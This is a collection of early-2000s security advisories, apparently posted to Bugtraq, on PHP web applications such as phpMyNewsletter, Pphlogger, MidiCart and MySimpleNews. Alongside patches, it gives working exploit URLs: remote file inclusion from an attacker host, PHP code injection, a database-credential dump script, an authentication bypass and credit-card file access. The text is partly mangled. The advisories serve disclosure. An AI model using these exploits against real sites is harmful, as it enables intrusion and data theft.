: ° http://[target]/vars.inc and http://[target]/protection.php?mode=displayusername=[LOGIN]password=[PASSWORD] Patch : °°° rename vars.inc vars.inc.php . In protection.php, replace require(vars2.inc); bye require(vars2.inc.php); More details in french : http://www.frog-man.org/tutos/KillerProtection.txt translated by Google : http://translate.google.com/translate?u=http://www.frog-man.org/tutos/KillerProtection.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ Affichez, modifiez et partagez gratuitement vos photos en ligne: http://photos.msn.com/support/worldwide.aspx
phpMyNewsletter
Informations : °° Product : phpMyNewsletter Tested version : 0.6.10 Website : http://gregory.kokanosky.free.fr/phpmynewsletter/ Problem : include file PHP code : °° /include/customize.php ? $langfile = $l; include $l; ? /include/customize.php Exploit : ° http://[target]/include/customize.php?l=http://[attacker]/code.txttext=Hello%20World With in http://[attacker]/code.txt : ? echo $text; ? or http://[target]/include/customize.php?l=../path/file/to/view Patch : °°° Autor has been alerted and last version (0.7beta1) has been patched. More details - in french : http://www.frog-man.org/tutos/phpMyNewsletter.txt - translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n
Multiple Web Security Holes
I sent this three times to webappsec but without resultats. I try so on bugtraq, although that is less appropriate. - Five products in PHP are vulnerable to various holes. 1) TightAuction Website : http://www.tightprices.com Tested Version : 3.0 Problem : BD informations disclosure Exploit : ? $victime=http://[target];; include($victime/config.inc); print(Infos de la DataBase du site $victime : \n \n); print(Login : $DB_Username \nPassword : $DB_Password \nServer : $DB_Database); ? 2) PY-Membres Website : http://py-scripts.levillage.org/ Tested Version : 3.1 Problem : Access to all accounts Exploit : http://[target]/index.php?pymembs=admin http://[target]/index.php?pymembs=[USER] Problem : ? if ($pymembs) { $login=$pymembs; session_start(); session_register('login'); } else { session_start(); } [...] if(!session_is_registered('login')) { ? [...] 3) upb PB Website : http://www.webrc.ca/ Tested Version : 1.0b Problem : Informations disclosure Exploit : http://[target]/db/users.dat 4) MidiCart PHP Website : http://www.midicart.com Version : 1 Problems : Informations disclosure, Upload Exploit : http://{target}/admin/credit_card_info.php http://{target}/admin/upload.php 5) Pphlogger Website : http://www.phpee.com Tested Versions : 2.0.9, 2.2.1, 2.2.2a Problem : Include file Exploit : http://[target]/showhits.php3?rel_path=http://[attacker] with http://[attacker]/main_location.inc or http://[attacker]/config.inc.php3 or http://[attacker]/get_userdata.php3 Problem : if (!isset($rel_path)) $rel_path=; include $rel_path.config.inc.php3; include $rel_path.get_userdata.php3; For more details patchs : In french : http://www.frog-man.org/tutos/5holes10.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes10.txtlangpair=fr%7Cenhl=frie=ASCIIoe=ASCII - Sorry for my poor english. frog-m@n _ Discutez en ligne avec vos amis ! http://messenger.msn.fr
MySimpleNews (PHP)
Informations : °° Language : PHP Tested version : 1 Website : ? Comment : Very simple code. a) Writing PHP code in a PHP file and execution of this code. Problem : ° - users.php - ? $fp=fopen(news.php3,a); fwrite($fp,Posté Par [$LOGIN]\n); fwrite($fp,Le $DATA\nbr); fwrite($fp,$MESS\nhr); fclose($fp); ? - users.php - Exploit : ° http://[target]/users.php?LOGIN=[PHP code] or http://[target]/users.php?DATA=[PHP code] or http://[target]/users.php?MESS=[PHP code] Execution : http://[target]/news.php3 b) Recovery of admin's password. Problem : ° -- admin.html -- moncode = prompt('MySimpleNews - Administration',''); if (moncode != [PASSWORD]) { location.href=about:Erreur 403; } -- admin.html -- Exploit : ° view-source:http://[target]/admin.html c) Deleting news. Problem : ° No security in the file. Exploit : ° http://[target]/vider.php3 Patch : °°° Use of htaccess. More details in french : http://www.frog-man.org/tutos/MySimpleNews.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMySimpleNews.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools frog-m@n _ Discutez en ligne avec vos amis ! http://messenger.msn.fr